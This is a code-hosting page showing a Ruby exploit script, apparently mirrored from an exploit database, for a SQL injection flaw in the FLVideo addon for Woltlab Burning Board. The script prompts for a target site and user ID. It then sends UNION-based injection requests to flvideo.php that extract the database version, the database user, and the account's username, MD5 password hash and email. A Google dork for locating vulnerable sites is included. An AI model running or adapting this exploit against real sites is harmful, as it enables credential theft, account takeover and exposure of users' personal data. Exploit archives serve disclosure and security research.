PageRenderTime 52ms CodeModel.GetById 24ms RepoModel.GetById 0ms app.codeStats 0ms

/exploits/php/webapps/28126.rb

https://bitbucket.org/DinoRex99/exploit-database
Ruby | 110 lines | 71 code | 6 blank | 33 comment | 0 complexity | 5025058aea5a3ab84c34923422994b47 MD5 | raw file
Possible License(s): GPL-2.0
  1. # Exploit Title: Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php Exploit
  2. # Google Dork: inurl:flvideo.php wbb (and more)
  3. # Date: 04.09.2013
  4. # Exploit Author: Easy Laster
  5. # Vendor Homepage: http://www.flvideo.de/
  6. # Version: FLVideo Addon for WBB © 2007 by Danny König
  7. # Tested on: Windows8/Backtrack
  8. #!/usr/bin/ruby
  9. #secunet.cc
  10. #19.02.2013
  11. #Discovered and Vulnerability by Easy Laster
  12. #flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*
  13. #*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(version()%20as%20char))
  14. #null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/
  15. #**/+userid=1--+
  16. print "
  17. ################################################################
  18. # secunet.cc #
  19. ################################################################
  20. #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
  21. #Woltlab Burning Board FLVideo Addon SQL Injection flvideo.php #
  22. # Exploit #
  23. # Using Host+Path+id #
  24. # www.demo.de + /wbb/ + or + / + 1 #
  25. # Easy Laster #
  26. #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
  27. ################################################################
  28. "
  29. require 'net/http'
  30. block = "################################################################"
  31. print ""+ block +""
  32. print "\nEnter Target Name (site.com)->"
  33. host=gets.chomp
  34. print ""+ block +""
  35. print "\nEnter Script Path (/wbb/ or /)->"
  36. path=gets.chomp
  37. print ""+ block +""
  38. print "\nEnter The ID From User (id)->"
  39. userid=gets.chomp
  40. print ""+ block +""
  41. begin
  42. dir = "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
  43. "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(version()%20as%20char))"+
  44. "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
  45. "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
  46. "**/+userid="+ userid +"--+"
  47. http = Net::HTTP.new(host, 80)
  48. resp= http.get(path+dir)
  49. print "\nVersion Database -> "+(/'~'(.+)'~'/).match(resp.body)[1]
  50. dir = "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
  51. "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(user()%20as%20char))"+
  52. "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
  53. "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
  54. "**/+userid="+ userid +"--+"
  55. http = Net::HTTP.new(host, 80)
  56. resp= http.get(path+dir)
  57. print "\nDatabase User -> "+(/'~'(.+)'~'/).match(resp.body)[1]
  58. dir = "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
  59. "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(userid%20as%20char))"+
  60. "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
  61. "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
  62. "**/+userid="+ userid +"--+"
  63. http = Net::HTTP.new(host, 80)
  64. resp= http.get(path+dir)
  65. print "\nID Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
  66. dir = "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
  67. "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(username%20as%20char))"+
  68. "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
  69. "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
  70. "**/+userid="+ userid +"--+"
  71. http = Net::HTTP.new(host, 80)
  72. resp= http.get(path+dir)
  73. print "\nUsername Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
  74. dir = "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
  75. "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(password%20as%20char))"+
  76. "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
  77. "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
  78. "**/+userid="+ userid +"--+"
  79. http = Net::HTTP.new(host, 80)
  80. resp= http.get(path+dir)
  81. print "\nPassword Account MD5 -> "+(/'~'(.+)'~'/).match(resp.body)[1]
  82. dir = "flvideo.php?action=search&for=cat&value=999999.9/**/+union/**/+all/*"+
  83. "*/+select/**/+concat(0x7e,0x27,unhex(Hex(cast(email%20as%20char))"+
  84. "),0x27,0x7e),null,null,null,null,null,null,null,null,null,null,null,"+
  85. "null,null,null,null,null,null,null/**/+from/**/+bb1_users/**/+where/"+
  86. "**/+userid="+ userid +"--+"
  87. http = Net::HTTP.new(host, 80)
  88. resp= http.get(path+dir)
  89. print "\nEmail Adresse Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
  90. print "\n"
  91. print ""+ block +""
  92. print "\n"
  93. print "
  94. ################################################################
  95. # Greetings #
  96. ################################################################
  97. #mAdDiN, c0Re, illuministrator, WD40, peak, IRET, GabbaGandalf #
  98. #DR.zydz, HANN!BAL, 6rbk9 , Manifest, doc, cr4ck, Prof.Dr. Ogen#
  99. #ezah, enco, 4c!d And SecuNet.cc, 4004, dc3 crew, hackbase.cc #
  100. ################################################################
  101. "
  102. rescue
  103. print "\nExploit Failed"
  104. end